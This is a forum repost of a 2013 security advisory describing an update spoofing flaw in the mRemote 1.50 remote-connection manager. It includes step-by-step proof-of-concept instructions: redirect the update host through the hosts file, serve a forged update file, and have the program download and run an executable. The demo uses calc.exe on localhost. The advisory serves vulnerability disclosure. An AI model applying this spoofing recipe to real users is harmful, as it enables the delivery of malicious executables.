Kwelwild Posted March 30, 2013 Report Posted March 30, 2013 mRemote version 1.50 suffers from an update spoofing vulnerability.[waraxe-2013-SA#100] - Update Spoofing Vulnerability in mRemote 1.50===============================================================================Author: Janek Vind "waraxe"Date: 29. March 2013Location: Estonia, TartuWeb: http://www.waraxe.us/advisory-100.htmlDescription of vulnerable software:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~mRemote is a software solution that will allow you to manage all your remotecontrol connections in a single place. Currently it supports the RDP, VNC,SSH2 and Telnet protocols.http://www.royalts.com/main/home/mRemote.aspxhttp://mremote-portable.softpile.com/58492/download/Vulnerable is version 1.50, other versions not tested.###############################################################################1. Update Spoofing Vulnerability###############################################################################Current version of mRemote contains security vulnerability in update mechanism,which can be exploited by malicious people to conduct spoofing attacks.When checking for updates, mRemote issues GET request over HTTP:GET /mRemote_Update.txt HTTP/1.1Host: update.mremote.orgConnection: Keep-AliveServer response:HTTP/1.1 200 OKContent-Length: 284Content-Type: text/plainLast-Modified: Wed, 22 Apr 2009 18:29:48 GMTAccept-Ranges: bytesETag: "16cc425178c3c91:1e75"Server: Microsoft-IIS/6.0X-Powered-By: ASP.NETDate: Thu, 28 Mar 2013 14:03:07 GMTVersion: 1.50dURL: http://www.mremote.org/wiki/GetFile.aspx?File=Downloads/mRemote_1.50_Setup.execlURL: http://update.mRemote.org/mRemote_1.50_ChangeLog.txtimgURL: http://update.mRemote.org/banners/Banner_vRD09.pngimgURLLink: http://www.visionapp.com/vRD2009-highlights.htmlmRemote user can click "Download and Install" button and mRemotewill download and install the update.Such update mechanism contains two security flaws:1. Update check is done over unencrypted HTTP channel. Malicious third partyis able to conduct Man-in-the-Middle (MitM) attacks and spoof server response.In this way it is possible to instruct mRemote to download malicious update.2. mRemote will execute downloaded update without digital signatureverification.Testing: tests were done using Windows 7 and Apache webserver. Steps:1. modify "windows/system32/drivers/etc/hosts" file in order to emulateDNS spoofing: 127.0.0.1 update.mremote.org2. create text file "mRemote_Update.txt" to the webserver main directorywith following content:Version: 1.51dURL: http://localhost/calc.execlURL: http://localhost/mRemote_1.51_ChangeLog.txtimgURL: http://update.mRemote.org/banners/Banner_vRD09.pngimgURLLink: http://www.visionapp.com/vRD2009-highlights.html3. create text file "mRemote_1.51_ChangeLog.txt" to the webserver maindirectory with following content:New version 1.51 available!4. Place "calc_EN.exe" file to the webserver main directory.5. Open mRemote, it will check for updates automatically.Response: New version 1.51 available!6. Press "Download and Install" button. Successful download ends with response:Download complete! mRemote will now quit and begin with the installation.7. Press "OK" button and downloaded exe file will be executed.Contact:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~come2waraxe@yahoo.comJanek Vind "waraxe"Waraxe forum: http://www.waraxe.us/forums.htmlPersonal homepage: http://www.janekvind.com/Random project: http://albumnow.com/---------------------------------- [ EOF ] ------------------------------------Sursa: mRemote 1.50 Update Spoofing ? Packet Storm Quote